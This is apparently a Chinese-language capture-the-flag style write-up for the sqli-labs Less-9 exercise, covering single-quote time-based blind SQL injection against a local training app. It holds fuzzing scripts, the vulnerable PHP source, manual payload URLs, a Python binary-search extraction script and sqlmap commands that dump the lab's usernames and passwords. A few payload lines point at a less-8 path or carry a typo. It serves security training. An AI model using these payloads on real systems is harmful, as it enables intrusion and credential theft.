sqli-lab-less9
一、靶标地址
Less-9 GET-Blind-Time Based-Single Quotes
#单引号时间盲注
http://127.0.0.1/sqli/less-9/
二、漏洞探测
由于探测的fuzz参数增多使用python脚本进行探测
import requests
url="http://192.168.128.159/sqli/less-9/index.php?id=1"
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
file = open("./fuzz.txt","r")
payloads = file.read().splitlines()
for i in range(1,len(payloads)+1):
print("==============This is "+ str(i) + payloads[i]+"==============")
payload=payloads[i]
response=requests.get(url+payload,headers=header)
print(response.text)
结果
' --+ 正常回显
" --+ 正常回显
') --+ 正常回显
") --+ 正常回显
')) --+ 正常回显
")) --+ 正常回显
因为回显无差异,所以尝试进行时间盲注脚本探测
import requests
import time
url="http://192.168.128.159/sqli/less-9/index.php?id=1"
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
file = open("./fuzz.txt","r")
payloads = file.read().splitlines()
for i in range(len(payloads)):
print("==============This is "+ str(i) + payloads[i]+"==============")
payload=payloads[i]
start = time.time()
response=requests.get(url+payload,headers=header)
end = time.time()
if end - start > 4:
print(end - start)
print(response.text)
else:
print(end - start)
结果
' and sleep(5) --+ 7秒回显
" and sleep(5) --+
') and sleep(5) --+
") and sleep(5) --+
')) and sleep(5) --+
")) and sleep(5) --+
推测语句为select * from users where id='id' limit 0,1;
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';#报错回显同正常回显
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
四、黑盒与白盒测试
查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema="security"(此处拿security库为例)
查字段:select column_name from information_schema.columns where table_name="users"(此处拿users表例)
查字段的值:select username,password from security.users(此处拿username,password字段为例
时间盲注常用的函数:
if(expr1,expr2,expr3):判断语句,如果第一个语句正确就执行第二个语句,如果错误执行第三个语句
sleep(n) 将程序挂起一段时间 n单位为秒
left(a,b) 从左侧截取a的前b位
substr(a,b,c) 从b位置开始,截取字符串a的c长度
mid(a,b,c) 从位置b开始,截取a字符串的c位
length() 返回字符串的长度
Ascii() 将某个字符转换为ascii值
char() 将ASCII码转换为对应的字符
#爆破的思路是
#数据库版本字符串长度
http://127.0.0.1/sqli/less-8/?id=1' and if(length(version())=5,sleep(5),0) --+
#数据库版本
http://127.0.0.1/sqli/less-8/?id=1' and if(left(version(),1)=5,sleep(5),0) --+
#数据库字符串长度
http://127.0.0.1/sqli/less-8/?id=1' and if(length(database())=5,sleep(5),0) --+
#数据库
#测试数据库名第一位是否为s
http://127.0.0.1/sqli/less-8/?id=1' and if(left(database(),1)=s,sleep(5),0) --+
#测试数据库名第一位是否为大于a
http://127.0.0.1/sqli/less-8/?id=1' and if(left(database(),1)>'a',sleep(5),0) --+
#测试数据库名前两位是否为大于sa
http://127.0.0.1/sqli/less-8/?id=1' and if(left(database(),2)>'sa',sleep(5)1,0) --+
#测试数据库的第一位是否大于80
http://127.0.0.1/sqli/less-8/?id=1' and if(ascii(substr(database(),1,1)) >80,sleep(5),0) --+
#测试数据库的第二位是否大于80
http://127.0.0.1/sqli/less-8/?id=1' and if(ascii(substr(database(),2,1)) >80,sleep(5),0) --+
#数据表个数#数据表名长度#数据表名
#通过变换xyz的值来判断
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit x,1),y)="z",sleep(5),0) --+
#字段个数#字段名长度#字段名
#通过变换xyz的值来判断
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit x,1),y)="z",sleep(5),0) --+
#字段的值
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select username from users limit x,1),y)="",sleep(5),0) --+
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select password from users limit x,1),y)="",sleep(5),0) --+
五、脚本撰写
#二分法爆破
#脚本并非爆破所有表,而是根据目标一步一步获得以减少流量
#爆破数据库名长度和数据库名
import requests
import time
url="http://192.168.128.159/sqli/less-9/index.php?id=1"
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
def getdbs():#获取数据库名
global current_dbs_name
current_dbs_name = ""
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
payload=f"\' and if(ascii(substr(database(),{i},1)) >{mid},sleep(1),0) --+"
start = time.time()
response=requests.get(url+payload,headers=header)
end = time.time()
if end - start > 3:
low = mid+1
else:
high = mid
mid=(low+high)//2
if mid <= 32 or mid >= 127:#以此判断长度
break
current_dbs_name += chr(mid)
print("The database is "+current_dbs_name)
def gettable(): #获取表名
global tables_name
tables_name=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
payload=f"\' and if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),{i},1)) >{mid},sleep(1),0) --+"
#已知数据库名security
start = time.time()
response=requests.get(url+payload,headers=header)
end = time.time()
if end - start > 3:
low = mid+1
else:
high = mid
mid=(low+high)//2
if mid <= 32 or mid >= 127:#以此判断长度
break
tables_name += chr(mid)
print("The tables is "+tables_name)
def getcolumn(): #获取字段名
global column_name
column_name=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
payload=f"\' and if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),{i},1)) >{mid},sleep(1),0) --+"
#已知数据表名users
start = time.time()
response=requests.get(url+payload,headers=header)
end = time.time()
if end - start > 3:
low = mid+1
else:
high = mid
mid=(low+high)//2
if mid <= 32 or mid >= 127:#以此判断长度
break
column_name += chr(mid)
print("The column_name is "+column_name)
def getcolumn_value(): #获取字段值
global column_value
column_value=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
payload=f"\' and if(ascii(substr((select(group_concat(password))from(users)),{i},1)) >{mid},sleep(1),0) --+"
#已知字段名password
#select(group_concat(password))from(users);
#select group_concat(password) from users;
start = time.time()
response=requests.get(url+payload,headers=header)
end = time.time()
if end - start > 3:
low = mid+1
else:
high = mid
mid=(low+high)//2
if mid <= 32 or mid >= 127:#以此判断长度
break
column_value += chr(mid)
print("The column_value is "+column_value)
getdbs()
gettable()
getcolumn()
getcolumn_value()
六、sqlmap
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --batch
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3087 FROM (SELECT(SLEEP(5)))nKZa) AND 'fsem'='fsem
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique T --dbs --batch
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique T -D security --tables --batch
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique B -D security -T users --columns --batch
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique B -D security -T users -C username,password --dump --batch
Database: security
Table: users
[13 entries]
+----------+------------+
| username | password |
+----------+------------+
| admin | admin |
| admin1 | admin1 |
| admin2 | admin2 |
| admin3 | admin3 |
| admin4 | admin4 |
| secure | crappy |
| Dumb | Dumb |
| dhakkan | dumbo |
| superman | genious |
| Angelina | I-kill-you |
| batman | mob!le |
| Dummy | p@ssword |
| stupid | stupidity |
+----------+------------+
七、总结
1、正常回显和报错回显相同采取时间盲注